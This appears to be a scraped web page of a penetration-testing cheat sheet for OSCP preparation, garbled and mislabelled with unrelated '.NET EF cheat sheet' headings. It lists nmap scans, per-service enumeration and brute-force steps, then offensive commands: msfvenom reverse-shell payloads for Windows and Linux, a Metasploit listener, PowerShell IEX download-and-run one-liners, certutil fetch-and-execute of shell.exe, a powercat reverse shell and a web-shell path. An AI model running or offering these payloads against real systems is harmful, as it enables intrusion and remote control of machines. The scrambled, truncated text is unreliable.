> dirb with -X extensions based on web technology. > On older hosts, this port servers SMB / SAMBA, scan by adding 'client min protocol = LANMAN1' to GLOBAL setting in /etc/samba/smb.conf or by using -option='client min protocol'=LANMAN1 with smbclient RPC – PORT 135 > sudo nmap -sS -Pn -sV -script=rpcinfo.nse -p135 0 RETR - To retrieve emails DNS – Port 53 Might indicate a domain controller on WindowsĬheck for zone transfer - Kerberos – Port 88
#DOTNET EF CHEAT SHEET COMMAND LINE FULL#
NMAP TCP quick > sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP NMAP TCP Full > sudo nmap -Pn -sS -stats-every 3m -max-retries 1 -max-scan-delay 20 -defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP NMAP TCP – Repeat if extra ports found > sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP NMAP UDP quick > sudo nmap -Pn -v -sU -sV -top-ports=30 -oN udp-quick.nmap IP NMAP UDP 1000 > sudo nmap -Pn -top-ports 1000 -sU -stats-every 3m -max-retries 1 -T4 -oN udp-1000.nmap IP NMAP UDP – Repeat if extra ports found > sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP EnumerationįTP – Port 21 Check for FTP version vulnsĬheck for Web root or root directories of any other accessible serviceĬheck for write access SSH – Port 22 Check for SSH version vulnsĬheck if host key was seen somewhere elseĬheck if it prompts for a password - means password login is allowed for some usersīruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if port gets filtered, there's defense mechanisms - fail2ban) Telnet – Port 23Ĭonnect and check for service running SMTP – Port 25Ĭheck for SMTP vulns Check version with HELO / HELLO POP – PORT 110 Connect using telnet
Net use x: \127.0.0.1share /user:userID myPassword Initial Enumeration Scanning
#DOTNET EF CHEAT SHEET COMMAND LINE DOWNLOAD#
SMB Upload / Download copy \\IP-address\share\x x $p = New-Object $p.DownloadFile(" "C:%homepath%file") HTTP Download certutil -urlcache -f shell.exe Sudo python -m SimpleHTTPServer 80 SMB sudo impacket-smbserver ClientįTP Upload / Download echo "open ">ftp.txt Serve FTP Python –c pyftpdlib –p 21 –write HTTP sudo python3 -m rver 80 Msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py File Transfer Msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf Msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe Msfvenom -p linux/圆4/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf Msfconsole -x "use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost tun0 set lport 4445 run -j" Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=1234 -f msi > 1.msi Powershell -c "IEX((New-Object ).DownloadString(''))" Powershell -c "IEX(New-Object ).DownloadString('') powercat -c -p 443 -e cmd" MORE certutil -urlcache -f shell.exe & shell.exe usr/share/webshells/php/simple-backdoor.php, paramter - cmd Msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f aspx > shell.aspx
Msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f asp > shell.asp Reverse Shells Reference – Refererd from vaiours online sources PayloadAllTheThings INITIAL ENTRY JSP / tomcat WAR A collection of publicly available cheat sheets for OSCP preparation.
0 kommentar(er)
